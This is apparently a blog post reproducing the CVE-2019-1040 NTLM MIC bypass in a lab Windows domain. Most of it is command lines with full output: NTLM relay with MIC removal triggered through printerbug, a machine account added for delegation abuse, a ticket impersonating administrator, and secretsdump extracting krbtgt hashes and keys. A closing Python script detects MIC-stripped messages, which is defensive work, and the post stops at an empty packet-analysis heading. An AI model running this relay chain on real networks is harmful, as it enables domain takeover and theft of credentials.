Administrator
Published 2025-06-04

5.2 CVE-2019-1040 NTLM MIC bypass vulnerability

Affected versions: https://nsfocusglobal.com/windows-ntlm-tampering-vulnerability-cve-2019-1040-threat-alert/

I. Reproducing the vulnerability

1. Exchange

Domain controller: 10.10.4.8

Exchange server: 10.10.4.5

Successfully reproduced on Windows Server 2016 and WinServer-2019-17763.379.

Start the listener:

(base) ┌──(root㉿Kali)-[~/tools]
└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.10.4.2 -smb2support --no-dump -debug

Trigger the relay with printerbug:

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.5 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.5
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─#

The account is successfully granted DCSync rights:

└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.10.4.8 -smb2support --no-dump -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
.............
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.5, attacking target ldap://10.10.4.8
[*] Authenticating against ldap://10.10.4.8 as SEC/EXCHANGE$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.5 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T01:53:16.425120
    distinguishedName: CN=Domain Computers,CN=Users,DC=sec,DC=local
    name: Domain Computers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-515
]
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.5 controlled, but there are no more targets left!

Verify with secretsdump:

(base) ┌──(root㉿Kali)-[~/tools]
└─# secretsdump.py sec.local/hack:"Az123456@"@10.10.4.2 -just-dc-user "sec\krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

(base) ┌──(root㉿Kali)-[~/tools]
└─#

2. Attacking a domain controller

Two domain controllers are required: one on which printerbug is triggered, and one to which the LDAP traffic is relayed to perform the privileged operations.

2.1 LDAPS supported

Listener:

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldaps://10.10.4.8 -smb2support --no-dump -debug

printerbug:

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.2 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.2
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

Relay; a machine account is created automatically:

└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldaps://10.10.4.8 -smb2support --no-dump -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
..........
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.2, attacking target ldaps://10.10.4.8
[*] Authenticating against ldaps://10.10.4.8 as SEC/WIN2019-DC1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620158
    name: Pre-Windows 2000 Compatible Access
    objectSid: S-1-5-32-554
, DN: CN=Denied RODC Password Replication Group,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620250
    name: Denied RODC Password Replication Group
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-572
, DN: CN=Cert Publishers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620315
    name: Cert Publishers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-517
]
[+] User is a member of: [DN: CN=Domain Controllers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.622590
    distinguishedName: CN=Domain Controllers,CN=Users,DC=sec,DC=local
    name: Domain Controllers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-516
]

2.2 LDAPS not supported

Add a machine account:

(base) ┌──(root㉿Kali)-[~/tools]
└─# addcomputer.py  -computer-name 'machine1$' -computer-pass "Az123456@"  -dc-ip 10.10.4.2 sec.local/hack:"Az123456@" -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine1$ with password Az123456@.

Listener:

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic -t ldap://10.10.4.8 -smb2support --no-dump --delegate-access --escalate-user machine1\$ -debug

printerbug:

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.2 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.2
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

Relay:

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic -t ldap://10.10.4.8 -smb2support --no-dump --delegate-access --escalate-user machine1\$ -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
......
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.2, attacking target ldap://10.10.4.8
[*] Authenticating against ldap://10.10.4.8 as SEC/WIN2019-DC1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875859
    name: Pre-Windows 2000 Compatible Access
    objectSid: S-1-5-32-554
, DN: CN=Denied RODC Password Replication Group,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875904
    name: Denied RODC Password Replication Group
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-572
, DN: CN=Cert Publishers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875941
    name: Cert Publishers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-517
]
[+] User is a member of: [DN: CN=Domain Controllers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.877919
    distinguishedName: CN=Domain Controllers,CN=Users,DC=sec,DC=local
    name: Domain Controllers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-516
]
[*] Delegation rights modified succesfully!
[*] machine1$ can now impersonate users on WIN2019-DC1$ via S4U2Proxy

Request a CIFS service ticket for the WIN2019-DC1 machine while impersonating Administrator:

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# getST.py -spn cifs/WIN2019-DC1.sec.local sec/machine1\$:"Az123456@" -dc-ip 10.10.4.2 -impersonate administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/root/miniconda3/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/root/miniconda3/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/root/miniconda3/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/root/miniconda3/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache

secretsdump:

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# export KRB5CCNAME=administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# secretsdump.py -k -no-pass WIN2019-DC1.sec.local  -just-dc-user "sec\krbtgt" -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache
[+] Domain retrieved from CCache: sec
[+] Returning cached credential for CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL
[+] Using TGS from cache
[+] Changing sname from cifs/WIN2019-DC1.sec.local@SEC.LOCAL to CIFS/WIN2019-DC1.SEC.LOCAL@SEC and hoping for the best
[+] Username retrieved from CCache: administrator
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for sec\krbtgt
[+] Calling DRSGetNCChanges for {1fe9dde2-5865-4607-8f43-73dc969fa65a}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=sec,DC=local
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...
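Every chain above hinges on the --remove-mic option: the relayed AUTHENTICATE_MESSAGE reaches the LDAP server with its MIC zeroed and the signing flags cleared, while the "MIC present" bit (MsvAvFlags 0x2) inside the HMAC-protected NTLMv2 response still says a MIC should be there, and an unpatched server never cross-checks the two. The Python script below is an added example written for this page (it is not the post's own code and not part of Impacket): it parses a raw AUTHENTICATE_MESSAGE by the MS-NLMP field layout and reports exactly that inconsistency, which is the condition the CVE-2019-1040 fix makes the server reject and what a detection over captured NTLM traffic can look for. Field offsets and AV_PAIR ids are from MS-NLMP; the two messages it inspects are constructed in the script (placeholder NTProofStr, MIC and Version bytes; the SEC / EXCHANGE$ / WIN2019-DC1 names are taken from the lab above), not real captures.

```python
import struct

# NegotiateFlags bits (MS-NLMP 2.2.2.5)
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
BASE_FLAGS = 0x02000201  # UNICODE | NTLM | VERSION: the rest of a typical client flag set
# AV_PAIR ids (MS-NLMP 2.2.2.1); bit 0x2 of MsvAvFlags means "this response carries a MIC"
MSV_AV_EOL, MSV_AV_NB_COMPUTER_NAME, MSV_AV_NB_DOMAIN_NAME, MSV_AV_FLAGS = 0x0, 0x1, 0x2, 0x6
MSV_AV_FLAG_MIC_PRESENT = 0x00000002
HEADER_LEN_WITH_MIC = 88  # Signature..MIC; a payload starting earlier means there is no MIC field
ZERO_MIC = b"\x00" * 16


def parse_av_pairs(data):
    """Return {AvId: value} from an AV_PAIR list, stopping at MsvAvEOL."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            break
        pairs[av_id] = data[pos:pos + av_len]
        pos += av_len
    return pairs


def parse_authenticate(msg):
    """Pull the fields a MIC check needs out of a raw AUTHENTICATE_MESSAGE."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    # Six (Len, MaxLen, Offset) descriptors at 12..59: Lm, Nt, Domain, User, Workstation, SessionKey
    fields = [struct.unpack_from("<HHI", msg, off) for off in range(12, 60, 8)]
    blob = lambda f: msg[f[2]:f[2] + f[0]]
    used = [f[2] for f in fields if f[0]]
    payload_start = min(used) if used else len(msg)
    nt_response = blob(fields[1])
    return {
        "domain": blob(fields[2]).decode("utf-16-le"),
        "user": blob(fields[3]).decode("utf-16-le"),
        "flags": struct.unpack_from("<I", msg, 60)[0],
        "mic": msg[72:88] if payload_start >= HEADER_LEN_WITH_MIC else None,
        # NTLMv2_RESPONSE = 16-byte NTProofStr + 28-byte client-challenge header + AV pairs
        "av_pairs": parse_av_pairs(nt_response[44:]),
    }


def inspect_authenticate(msg):
    """Return the anomalies that mark a MIC-stripped AUTHENTICATE_MESSAGE."""
    p = parse_authenticate(msg)
    raw = p["av_pairs"].get(MSV_AV_FLAGS, b"")
    av_flags = struct.unpack("<I", raw)[0] if len(raw) == 4 else 0
    findings = []
    # The AV pairs sit inside the HMAC-protected NTLMv2 response, so the client's own
    # "MIC present" claim survives relaying untouched; a zeroed or absent MIC next to
    # that claim is the condition the CVE-2019-1040 fix makes the server reject.
    if av_flags & MSV_AV_FLAG_MIC_PRESENT and p["mic"] in (None, ZERO_MIC):
        findings.append("mic_stripped")
    if not p["flags"] & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN):
        findings.append("signing_disabled")
    return findings


def build_ntlmv2_response(av_pairs):
    """Constructed NTLMv2_RESPONSE shell: placeholder NTProofStr, fixed header, then AV pairs."""
    header = (b"\x01\x01" + b"\x00" * 6                       # RespType, HiRespType, Reserved1/2
              + struct.pack("<Q", 133_000_000_000_000_000)   # TimeStamp (FILETIME)
              + b"\x11" * 8 + b"\x00" * 4)                    # ChallengeFromClient, Reserved3
    av_blob = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in av_pairs)
    return bytes(range(16)) + header + av_blob + struct.pack("<HH", MSV_AV_EOL, 0)


def build_authenticate(nt_response, domain, user, flags, mic):
    """Assemble an AUTHENTICATE_MESSAGE whose payload begins right after the MIC field."""
    blobs = [b"\x00" * 24, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), "EXCHANGE".encode("utf-16-le"), b""]
    descriptors, payload = b"", b""
    for b in blobs:
        descriptors += struct.pack("<HHI", len(b), len(b), HEADER_LEN_WITH_MIC + len(payload))
        payload += b
    version = b"\x0a\x00\x61\x4a\x00\x00\x00\x0f"  # constructed VERSION field
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + descriptors
            + struct.pack("<I", flags) + version + mic + payload)


# Constructed samples, not captures: a client that computes a MIC also adds MsvAvFlags 0x2
AV_PAIRS = [(MSV_AV_NB_DOMAIN_NAME, "SEC".encode("utf-16-le")),
            (MSV_AV_NB_COMPUTER_NAME, "WIN2019-DC1".encode("utf-16-le")),
            (MSV_AV_FLAGS, struct.pack("<I", MSV_AV_FLAG_MIC_PRESENT))]
GENUINE = build_authenticate(build_ntlmv2_response(AV_PAIRS), "SEC", "EXCHANGE$",
                             BASE_FLAGS | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN,
                             b"\xab" * 16)           # placeholder MIC bytes, as the client sent it
TAMPERED = build_authenticate(build_ntlmv2_response(AV_PAIRS), "SEC", "EXCHANGE$",
                              BASE_FLAGS, ZERO_MIC)  # what the server sees after MIC removal

if __name__ == "__main__":
    for name, msg in (("genuine", GENUINE), ("tampered", TAMPERED)):
        p = parse_authenticate(msg)
        print(name, p["domain"] + "\\" + p["user"], inspect_authenticate(msg) or "no anomalies")
```

Run as-is, the genuine message reports no anomalies and the tampered one reports mic_stripped and signing_disabled; on real traffic, feed parse_authenticate the NTLMSSP blob extracted from the SMB Session Setup or LDAP bind request. A zeroed MIC beside the 0x2 flag is never produced by a legitimate client, so it is a high-confidence indicator on its own; cleared signing flags alone are weaker, because a client that never negotiated signing shows the same flags legitimately.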

II. Packet capture analysis

